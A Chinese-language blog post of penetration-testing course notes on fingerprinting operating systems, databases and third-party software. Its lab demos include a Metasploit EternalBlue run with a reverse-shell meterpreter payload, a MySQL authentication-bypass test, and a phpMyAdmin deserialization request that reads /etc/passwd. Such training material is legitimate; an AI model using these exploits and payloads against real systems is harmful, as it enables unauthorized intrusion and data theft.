Day05 基础入门-系统及数据库等

  • Post author:
  • Post category:其他




Day05 基础入门-系统及数据库等



声明:本文章仅仅是个人学习笔记,仅供交流学习使用,请勿用于非法用途

——小迪web安全渗透培训视频笔记



前言

除去搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到Web或服务器的安全,导致网站或服务器权限的获取。



内容



操作系统层面


识别操作系统常见方法

通过网站或通过扫描相关软件识别


1. 通过url的大小写改变来判断服务器系统

大小写对网页都没有影响,这种情况就可以认定为windows服务器,因为windows服务器不区分大小写

大小写改变会报错,这个网站对应的操作系统是linux服务器


2. 也可以用TTL来判断服务器系统,相邻的值来判断


3. 可用

nmap

来判断操作系统

nmap -O IP


简要两者区别及识别意义

网站路径、大小写、文件在两个系统之间的适用性,兼容性


操作系统层面漏洞类型对应意义

有些漏洞危害不大,而有些漏洞会导致服务器权限的丢失。

漏洞类型的不同会造成利用这个漏洞时的条件


简要操作系统层面漏洞影响范围

利用漏洞去获取权限或者对某些服务进行干扰



数据库层面


识别数据库类型常见方法

通过网站识别数据库,通过脚本连接的数据库

ASP+Access(windows) 端口:无

PHP+Mysql 端口:3306

ASPX+Mssql(windows) 端口:1433

Jsp+Mssql,oracle 端口:1521

Python+Mongodb 端口:27017


端口扫描


数据库类型区别及识别意义

每个数据库里面的安全机制,写法结构都有些许不一样,同样产生的漏洞也不一样。


数据库常见漏洞类型及攻击

弱口令


简要数据库层面漏洞影响范围

得到网站管理员数据可登录后台,得到用户数据能登录用户信息,进行修改,通过数据库操作可进行漏洞攻击,也可以获取数据库权限和网站权限。



第三方层面


如何判断有哪些第三方平台或软件

多层次判断,不能仅限于端口扫描,根据不同的应用采取不同的方法。


简要为什么要识别第三方平台或软件

常见第三方平台或软件漏洞类型及攻击

简要第三方平台或软件安全测试的范围


补充

除去常规WEB安全及APP安全测试外,类似服务器单一或复杂的其他服务(邮件、游戏、负载均衡等)也可以作为安全测试目标,此类目标测试原则只是少了WEB应用或其他安全问题。所以明确安全测试思路是很重要的!



案例演示

  • 上述涉及的基础知识演示
  • 某操作系统层面漏洞演示
  • 某数据库弱口令及漏洞演示
  • 某第三方应用安全漏洞

以下案例不需要掌握漏洞的利用,只是了解一下各层面的漏洞



案例1:上述涉及的基础知识演示

详细看

内容

部分



案例2:某操作系统层面漏洞演示


本实验是在靶机进行的,请勿用于未授权的真实环境中,否则后果自负。


环境配置

靶机

win2008R2 x64

IP:192.168.3.31

445端口开放

攻击机

kali

IP:192.168.3.222


操作

打开msf

msfconsole	# 打开msf

use exploit/multi/handle

use exploit/windows/smb/ms17_010_eternalblue	

set payload windows/x64/meterpreter/reverse_tcp		# 设置payload

查看配置参数

msf5> show options 

设置参数

set lhost 192.168.3.222		# 设置本机地址(即攻击机的IP)

set rhost 192.168.3.31		# 设置目标地址

run

拿到权限

meterpreter > shell

meterpreter > ipconfig

可以看到

ipconfig

命令打印出来靶机IP:

192.168.3.31



案例3:某数据库弱口令及漏洞演示

https://vulhub.org/#/environments/mysql/CVE-2012-2122/


环境配置

靶机

Ubuntu + vulhub靶场环境

IP:192.168.131.135

攻击机

kali


操作

开启靶场环境(mysql漏洞环境)

cd vulhub靶场项目目录

cd mysql/CVE-2012-2122/

docker-compose up -d

进行攻击

nmap扫描端口

发现端口3306开放,对应mysql数据库服务

查找mysql数据库漏洞 ,符合

CVE-2012-2122

Mysql身份认证绕过漏洞

利用

msf

进行漏洞测试

成功



案例4:某第三方应用安全漏洞演示

https://vulhub.org/#/environments/phpmyadmin/WooYun-2016-199433/


环境配置

靶场

Ubuntu + vulhub靶场环境

IP:192.168.56.130

攻击机

win10 本地物理机


操作

开启漏洞环境

访问

http://your-ip:8080

,您将看到 phpmyadmin 主页。因为没有连接到数据库,我们会得到一个错误。但是这个漏洞与数据库无关,所以直接忽略。

Burpsuite发包

发送以下包 /etc/passwd:

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

记得把 your-ip改成靶机的IP

结果



涉及资源


https://nmap.org/

# nmap


https://www.kali.org/

# kali官网


https://vulhub.org/

# vulhub


https://github.com/hellogoldsnakeman/masnmapscan-V1.0

# masnmapscan端口扫描器